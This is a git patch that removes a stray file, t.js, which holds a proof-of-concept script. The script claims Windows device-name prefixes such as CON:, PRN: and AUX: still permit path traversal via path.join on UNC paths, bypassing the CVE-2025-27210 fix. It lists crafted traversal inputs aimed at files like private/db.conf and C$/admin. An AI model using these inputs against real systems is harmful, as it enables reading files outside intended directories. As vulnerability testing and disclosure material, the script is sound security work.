From e7d071f0a11241f49e0663c16902bd87b2c1c2df Mon Sep 17 00:00:00 2001
From: RafaelGSS
Date: Tue, 13 Jan 2026 11:31:31 -0300
Subject: [PATCH] meta: remove t.js

It was added by mistake in the last release
---
t.js | 39 ---------------------------------------
1 file changed, 39 deletions(-)
delete mode 100644 t.js

diff --git a/t.js b/t.js
deleted file mode 100644
index 8b293114dfd1a1..00000000000000
--- a/t.js
+++ /dev/null
@@ -1,39 +0,0 @@
-const path = require("path")
-
-console.log("Node.js UNC Path Device Name Bypass PoC");
-console.log("Version:", process.version);
-console.log("Date:", new Date().toISOString());
-console.log("");
-
-console.log("[1] CVE-2025-27210 Fixed for regular paths:");
-console.log(" path.normalize(\"CON:../../secret.txt\")");
-console.log(" Result:", path.normalize("CON:../../secret.txt"));
-console.log(" SAFE - Device name prefixed");
-console.log("");
-
-console.log("[2] UNC paths with path.join() - STILL VULNERABLE:");
-
-function testExploit(testName, base, input, expectedSafe) {
- const result = path.join(base, input);
- const baseDepth = base.split("\\\\").length;
- const resultDepth = result.split("\\\\").length;
- const escaped = result.indexOf(base.split("\\\\").pop()) === -1;
-
- console.log(`\n[${testName}]`);
- console.log(" Base Path:", base);
- console.log(" Malicious Input:", input);
- console.log(" Result Path:", result);
- console.log(" Expected Safe:", expectedSafe);
- console.log(" Actual Result:", result);
- console.log(" BYPASSED:", escaped || !result.startsWith(base.substring(0,10)) ? "YES" : "NO");
-}
-
-testExploit("Test 1", "\\\\fileserver\\\\public\\\\uploads", "CON:../../../private/db.conf", "\\\\fileserver\\\\public\\\\uploads\\\\.\\\\CON:..\\\\..\\\\..\\\\private\\\\db.conf");
-testExploit("Test 2", "\\\\webapp\\\\data", "PRN:../../C$/admin", "\\\\webapp\\\\data\\\\.\\\\PRN:..\\\\..\\\\C$\\\\admin");
-testExploit("Test 3", "\\\\nas\\\\share", "AUX:../secret", "\\\\nas\\\\share\\\\.\\\\AUX:..\\\\secret");
-
-console.log("\n[!] All device names allow path traversal in UNC paths!");
-console.log("[!] This bypasses CVE-2025-27210 protection!");
-
-console.log('Path.join')
-console.log(path.join('/home/rafaelgss/', '../tmp'))